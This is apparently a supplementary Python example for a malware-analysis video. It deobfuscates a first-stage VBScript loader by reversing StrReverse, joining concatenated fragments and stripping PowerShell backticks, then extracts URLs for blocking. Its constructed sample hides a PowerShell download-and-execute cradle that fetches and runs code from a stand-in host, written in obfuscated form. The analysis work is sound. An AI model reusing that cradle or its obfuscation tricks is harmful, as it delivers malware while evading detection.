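The manual clean-up steps applied to the first-stage script earlier (folding StrReverse("llehsrewop") back into "powershell", joining the `&`-concatenated pieces, dropping the `'+'` filler and the backticks), as an added Python example that is not part of the video or of the samples it analyzes. The obfuscated run line and the URL are constructed stand-ins; the one refinement over the video's "replace the backtick with nothing" approach is that backticks forming real PowerShell escapes (`` `t ``, `` `n ``) are kept as the characters they denote.

```python
import re

# Added example, not from the video: re-implements the clean-up passes applied
# to the first-stage .vbs. All sample values below are constructed.

# Backtick escapes that change meaning in Windows PowerShell 5.1; any other
# backtick merely hides the character that follows it.
_PS_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "0": "\0",
               "a": "\a", "b": "\b", "f": "\f", "v": "\v"}


def eval_strreverse(vbs: str) -> str:
    """Fold StrReverse("...") into the reversed literal, as VBScript does at run time."""
    return re.sub(r'StrReverse\("([^"]*)"\)',
                  lambda m: '"' + m.group(1)[::-1] + '"', vbs, flags=re.I)


def join_vbs_literals(vbs: str) -> str:
    """Collapse "a" & "b" into "ab" so the command reads as one VBScript string."""
    return re.sub(r'"\s*&\s*"', "", vbs)


def strip_empty_concats(ps: str) -> str:
    """Remove '+' between PowerShell fragments: 'New-Ob'+'ject' -> 'New-Object'."""
    return re.sub(r"'\s*\+\s*'", "", ps)


def strip_backtick_escapes(ps: str) -> str:
    """Drop filler backticks (Inv`o`ke -> Invoke) but honour real escapes (`t -> tab)."""
    return re.sub(r"`(.)", lambda m: _PS_ESCAPES.get(m.group(1), m.group(1)),
                  ps, flags=re.S)


def deobfuscate_stage1(vbs: str) -> str:
    """Run the passes in the order the layers were applied, outermost first."""
    cleaned = eval_strreverse(vbs)
    cleaned = join_vbs_literals(cleaned)
    cleaned = strip_empty_concats(cleaned)
    return strip_backtick_escapes(cleaned)


def extract_urls(text: str) -> list:
    """Pull download URLs out of the cleaned command for blocking and hunting."""
    return re.findall(r"https?://[^\s'\"()]+", text)


# Constructed stand-in for the obfuscated run line in the first-stage script.
SAMPLE_STAGE1 = (
    'cmd = StrReverse("llehsrewop") & " -NoExit -Command " & '
    '"Inv`o`ke-E`x`pres`s`i`on (N\'+\'ew-Ob\'+\'ject Net.WebClient)'
    ".DownloadString('http://stage2.invalid/i.jpg')\""
)

if __name__ == "__main__":
    print(deobfuscate_stage1(SAMPLE_STAGE1))
```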